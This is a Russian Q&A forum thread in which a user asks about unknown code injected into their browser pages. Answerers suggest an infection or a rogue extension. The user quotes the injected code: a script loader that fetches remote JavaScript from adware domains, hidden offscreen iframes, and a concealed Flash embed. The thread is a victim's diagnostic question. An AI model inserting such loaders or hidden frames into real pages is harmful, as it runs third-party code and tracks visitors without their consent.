PiCoderman
@PiCoderman

Что это за код?

Что это за код :
<script type="text/javascript">(function(){var a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="http://img.rafomedia.com/zr/js/adrsq.js?lyy";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b);})();</script>


Отключил все расширения. И еще :

<iframe class="hb1434039655134" id="hb1434039655134" frameborder="0" border="no" scrolling="no" style="width: 1px; height: 1px; position: absolute; top: -100000px; left: -100000px; visibility: visible; overflow: hidden;" src="https://foxi69.tlscdn.com/altHbHandler.html#opdom=rfgdjs.info&amp;partner=rfgd&amp;channel=rfgdyk&amp;country=RU&amp;quick=https%3A%2F%2Fendall41-q.apollocdn.com%2F&amp;trinity=Z11n2h5g191i&amp;instgrp=&amp;referrer="></iframe>


<iframe id="asdfad" src="http://f.asdfzxcv1312.com/idle.html#B3bKB209CMzNzgPZlMLUzM8MCgfYDg5LCJ1YzMDKjMnOyw5UzwW9CMzNzhLRjMnVDw50CNK9uLuMy3vYCMvUDgrVBwfPBJ1HC2rMENHJDJeZmtiUy29TjNrYAw5PDhK9wJeXBJjOnwCXotfPjMLUC3rNCNa9jNnLC3nPB25Pzd0Xndm0mdm5nJu1mtq2nJeWnszOAwq9ota0otbKnwqTyJHImc00n2iYlweWzMyTndm0yJHKyMyYm2fMjNbHz2v1CMW9Ahr0CcuZqsuYrIuYrNnVyY5WAwXHyNiUCNuLmKy=" visibility="visible" overflow="hidden" frameborder="0" border="no" scrolling="no" style="width: 0;  height: 0;  position: absolute;  top: -10031px;  left:-1000000px;"></iframe>


<div id="dp_swf_engine" style="position: absolute; width: 1px; height: 1px;"><embed style="width: 1px; height: 1px;" type="application/x-shockwave-flash" src="http://www.ajaxcdn.org/swf.swf" width="1" height="1" id="_dp_swf_engine" name="_dp_swf_engine" bgcolor="#336699" quality="high" allowscriptaccess="always"></div>


<iframe class="dealply-toast s" id="s" frameborder="0" border="no" scrolling="no" style="width: 1px; height: 1px; position: absolute; top: -100000px; left: -100000px; visibility: visible; overflow: hidden;" src="http://f.rfgdjs.info/skinedEmpty.html"></iframe>


Это все тоже не мое!

Такое теперь во всех браузерах. И еще нашел в Sources : api.rafomedia.com/server/rfdls.php :
(function(s){var js = document.createElement('script');js.src = s;document.getElementsByTagName('head')[0].appendChild(js);})('https://cf.ipav.xyz/6/js/ipavxyz-6-cf.min.js?eyJwYXJ0bmVyIjp7Im5hbWUiOiJHcmVhdCBEZWFsc1x0IiwiaWQiOiJSQUZPIiwiZW1haWwiOiJ0aWNrZXRzQGl0ZXJhdGUudXNlcnZvaWNlLmNvbSIsInVybCI6IiJ9LCJzZWFyY2giOnRydWUsInBvcG92ZXJJbWFnZSI6dHJ1ZSwicHJvZHVjdEltYWdlIjp0cnVlfQ=#yk');;
  • Вопрос задан
  • 2141 просмотр
Решения вопроса 1
paradokso
@paradokso
Начинающий фронт-эндер
там в ссылках в первой строчке eval стоит - видимо у вас на ПК/браузере вирусок, раз с других компов все ок.
Ответ написан
Пригласить эксперта
Ответы на вопрос 2
miraage
@miraage
Старый прогер
Проверьте расширения.
Ответ написан
evnuh
@evnuh
Поиск Гугл помог мне, впусти и ты его в свой дом
это вирус, на сайте
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы